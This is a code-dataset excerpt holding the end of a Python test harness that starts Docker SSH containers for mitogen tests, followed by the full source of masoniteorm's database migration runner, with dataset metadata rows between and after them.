assert 0, '%r raised %r, not %r' % (func, e, exc)
assert 0, '%r did not raise %r' % (func, exc)
def get_docker_host():
url = os.environ.get('DOCKER_HOST')
if url in (None, 'http+docker://localunixsocket'):
return 'localhost'
parsed = urlparse.urlparse(url)
return parsed.netloc.partition(':')[0]
class DockerizedSshDaemon(object):
def _get_container_port(self):
s = subprocess__check_output(['docker', 'port', self.container_name])
for line in s.decode().splitlines():
dport, proto, baddr, bport = self.PORT_RE.match(line).groups()
if dport == '22' and proto == 'tcp':
self.port = int(bport)
self.host = self.get_host()
if self.port is None:
raise ValueError('could not find SSH port in: %r' % (s,))
def start_container(self):
try:
subprocess__check_output(['docker', '--version'])
except Exception:
raise unittest2.SkipTest('Docker binary is unavailable')
self.container_name = 'mitogen-test-%08x' % (random.getrandbits(64),)
args = [
'docker',
'run',
'--detach',
'--privileged',
'--publish-all',
'--name', self.container_name,
self.image,
]
subprocess__check_output(args)
self._get_container_port()
def __init__(self, mitogen_test_distro=os.environ.get('MITOGEN_TEST_DISTRO', 'debian')):
if '-' in mitogen_test_distro:
distro, _py3 = mitogen_test_distro.split('-')
else:
distro = mitogen_test_distro
_py3 = None
if _py3 == 'py3':
self.python_path = '/usr/bin/python3'
else:
self.python_path = '/usr/bin/python'
self.image = 'mitogen/%s-test' % (distro,)
# 22/tcp -> 0.0.0.0:32771
self.PORT_RE = re.compile(r'([^/]+)/([^ ]+) -> ([^:]+):(.*)')
self.port = None
self.start_container()
def get_host(self):
return get_docker_host()
def wait_for_sshd(self):
wait_for_port(self.get_host(), self.port, pattern='OpenSSH')
def check_processes(self):
args = ['docker', 'exec', self.container_name, 'ps', '-o', 'comm=']
counts = {}
for comm in subprocess__check_output(args).decode().splitlines():
comm = comm.strip()
counts[comm] = counts.get(comm, 0) + 1
if counts != {'ps': 1, 'sshd': 1}:
assert 0, (
'Docker container %r contained extra running processes '
'after test completed: %r' % (
self.container_name,
counts
)
)
def close(self):
args = ['docker', 'rm', '-f', self.container_name]
subprocess__check_output(args)
class BrokerMixin(object):
broker_class = mitogen.master.Broker
broker_shutdown = False
def setUp(self):
super(BrokerMixin, self).setUp()
self.broker = self.broker_class()
def tearDown(self):
if not self.broker_shutdown:
self.broker.shutdown()
self.broker.join()
del self.broker
super(BrokerMixin, self).tearDown()
def sync_with_broker(self):
sync_with_broker(self.broker)
class RouterMixin(BrokerMixin):
router_class = mitogen.master.Router
def setUp(self):
super(RouterMixin, self).setUp()
self.router = self.router_class(self.broker)
def tearDown(self):
del self.router
super(RouterMixin, self).tearDown()
class DockerMixin(RouterMixin):
@classmethod
def setUpClass(cls):
super(DockerMixin, cls).setUpClass()
if os.environ.get('SKIP_DOCKER_TESTS'):
raise unittest2.SkipTest('SKIP_DOCKER_TESTS is set')
# we want to be able to override test distro for some tests that need a different container spun up
daemon_args = {}
if hasattr(cls, 'mitogen_test_distro'):
daemon_args['mitogen_test_distro'] = cls.mitogen_test_distro
cls.dockerized_ssh = DockerizedSshDaemon(**daemon_args)
cls.dockerized_ssh.wait_for_sshd()
@classmethod
def tearDownClass(cls):
cls.dockerized_ssh.check_processes()
cls.dockerized_ssh.close()
super(DockerMixin, cls).tearDownClass()
def docker_ssh(self, **kwargs):
kwargs.setdefault('hostname', self.dockerized_ssh.host)
kwargs.setdefault('port', self.dockerized_ssh.port)
kwargs.setdefault('check_host_keys', 'ignore')
kwargs.setdefault('ssh_debug_level', 3)
kwargs.setdefault('python_path', self.dockerized_ssh.python_path)
return self.router.ssh(**kwargs)
def docker_ssh_any(self, **kwargs):
return self.docker_ssh(
username='mitogen__has_sudo_nopw',
password='has_sudo_nopw_password',
)
| 28.927405 | 107 | 0.583851 |
ace8f108b382b87dd89546e9373c356d4d55e754 | 8,716 | py | Python | src/masoniteorm/migrations/Migration.py | alfonsocv12/orm | 87b2532c7673a28c143600329df68e0343607f55 | [
"MIT"
] | 94 | 2020-02-08T21:08:56.000Z | 2022-03-28T15:24:52.000Z | src/masoniteorm/migrations/Migration.py | alfonsocv12/orm | 87b2532c7673a28c143600329df68e0343607f55 | [
"MIT"
] | 441 | 2020-02-09T06:17:44.000Z | 2022-03-30T07:27:39.000Z | src/masoniteorm/migrations/Migration.py | alfonsocv12/orm | 87b2532c7673a28c143600329df68e0343607f55 | [
"MIT"
] | 28 | 2020-02-26T10:29:05.000Z | 2022-03-30T19:08:28.000Z | import os
from os import listdir
from os.path import isfile, join
from pydoc import locate
from inflection import camelize
from ..models.MigrationModel import MigrationModel
from ..schema import Schema
from ..config import load_config
from timeit import default_timer as timer
class Migration:
def __init__(
self,
connection="default",
dry=False,
command_class=None,
migration_directory="databases/migrations",
config_path=None,
):
self.connection = connection
self.migration_directory = migration_directory
self.last_migrations_ran = []
self.command_class = command_class
DB = load_config(config_path).DB
DATABASES = DB.get_connection_details()
self.schema = Schema(
connection=connection, connection_details=DATABASES, dry=dry
)
self.migration_model = MigrationModel.on(self.connection)
def create_table_if_not_exists(self):
if not self.schema.has_table("migrations"):
with self.schema.create("migrations") as table:
table.increments("migration_id")
table.string("migration")
table.integer("batch")
return True
return False
def get_unran_migrations(self):
directory_path = os.path.join(os.getcwd(), self.migration_directory)
all_migrations = [
f.replace(".py", "")
for f in listdir(directory_path)
if isfile(join(directory_path, f)) and f != "__init__.py"
]
all_migrations.sort()
unran_migrations = []
database_migrations = self.migration_model.all()
for migration in all_migrations:
if migration not in database_migrations.pluck("migration"):
unran_migrations.append(migration)
return unran_migrations
def get_rollback_migrations(self):
return (
self.migration_model.where("batch", self.migration_model.all().max("batch"))
.order_by("migration_id", "desc")
.get()
.pluck("migration")
)
def get_all_migrations(self, reverse=False):
if reverse:
return (
self.migration_model.order_by("migration_id", "desc")
.get()
.pluck("migration")
)
return self.migration_model.all().pluck("migration")
def get_last_batch_number(self):
return self.migration_model.select("batch").get().max("batch")
def delete_migration(self, file_path):
return self.migration_model.where("migration", file_path).delete()
def locate(self, file_name):
migration_name = camelize("_".join(file_name.split("_")[4:]).replace(".py", ""))
file_name = file_name.replace(".py", "")
migration_directory = self.migration_directory.replace("/", ".").replace(
"\\", "."
)
return locate(f"{migration_directory}.{file_name}.{migration_name}")
def get_ran_migrations(self):
directory_path = os.path.join(os.getcwd(), self.migration_directory)
all_migrations = [
f.replace(".py", "")
for f in listdir(directory_path)
if isfile(join(directory_path, f)) and f != "__init__.py"
]
all_migrations.sort()
ran = []
database_migrations = self.migration_model.all()
for migration in all_migrations:
if migration in database_migrations.pluck("migration"):
ran.append(migration)
return ran
def migrate(self, migration="all", output=False):
default_migrations = self.get_unran_migrations()
migrations = default_migrations if migration == "all" else [migration]
batch = self.get_last_batch_number() + 1
for migration in migrations:
try:
migration_class = self.locate(migration)
except TypeError:
self.command_class.line(f"<error>Not Found: {migration}</error>")
continue
self.last_migrations_ran.append(migration)
if self.command_class:
self.command_class.line(
f"<comment>Migrating:</comment> <question>{migration}</question>"
)
migration_class = migration_class(connection=self.connection)
if output:
migration_class.schema.dry()
start = timer()
migration_class.up()
duration = "{:.2f}".format(timer() - start)
if output:
if self.command_class:
table = self.command_class.table()
table.set_header_row(["SQL"])
sql = migration_class.schema._blueprint.to_sql()
if isinstance(sql, list):
sql = ",".join(sql)
table.set_rows([[sql]])
table.render(self.command_class.io)
continue
else:
print(migration_class.schema._blueprint.to_sql())
if self.command_class:
self.command_class.line(
f"<info>Migrated:</info> <question>{migration}</question> ({duration}s)"
)
self.migration_model.create(
{"batch": batch, "migration": migration.replace(".py", "")}
)
def rollback(self, migration="all", output=False):
default_migrations = self.get_rollback_migrations()
migrations = default_migrations if migration == "all" else [migration]
for migration in migrations:
if self.command_class:
self.command_class.line(
f"<comment>Rolling back:</comment> <question>{migration}</question>"
)
try:
migration_class = self.locate(migration)
except TypeError:
self.command_class.line(f"<error>Not Found: {migration}</error>")
continue
migration_class = migration_class(connection=self.connection)
if output:
migration_class.schema.dry()
start = timer()
migration_class.down()
duration = "{:.2f}".format(timer() - start)
if output:
if self.command_class:
table = self.command_class.table()
table.set_header_row(["SQL"])
if (
hasattr(migration_class.schema, "_blueprint")
and migration_class.schema._blueprint
):
sql = migration_class.schema._blueprint.to_sql()
if isinstance(sql, list):
sql = ",".join(sql)
table.set_rows([[sql]])
elif migration_class.schema._sql:
table.set_rows([[migration_class.schema._sql]])
table.render(self.command_class.io)
continue
else:
print(migration_class.schema._blueprint.to_sql())
self.delete_migration(migration)
if self.command_class:
self.command_class.line(
f"<info>Rolled back:</info> <question>{migration}</question> ({duration}s)"
)
def delete_migrations(self, migrations=None):
return self.migration_model.where_in("migration", migrations or []).delete()
def delete_last_batch(self):
return self.migration_model.where(
"batch", self.get_last_batch_number()
).delete()
def reset(self):
for migration in self.get_all_migrations(reverse=True):
if self.command_class:
self.command_class.line(
f"<comment>Rolling back:</comment> <question>{migration}</question>"
)
try:
self.locate(migration)(connection=self.connection).down()
except TypeError:
self.command_class.line(f"<error>Not Found: {migration}</error>")
continue
# raise MigrationNotFound(f"Could not find {migration}")
self.delete_migration(migration)
if self.command_class:
self.command_class.line(
f"<info>Rolled back:</info> <question>{migration}</question>"
)
self.delete_migrations([migration])
if self.command_class:
self.command_class.line("")
def refresh(self):
self.reset()
self.migrate()
| 33.914397 | 95 | 0.563447 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.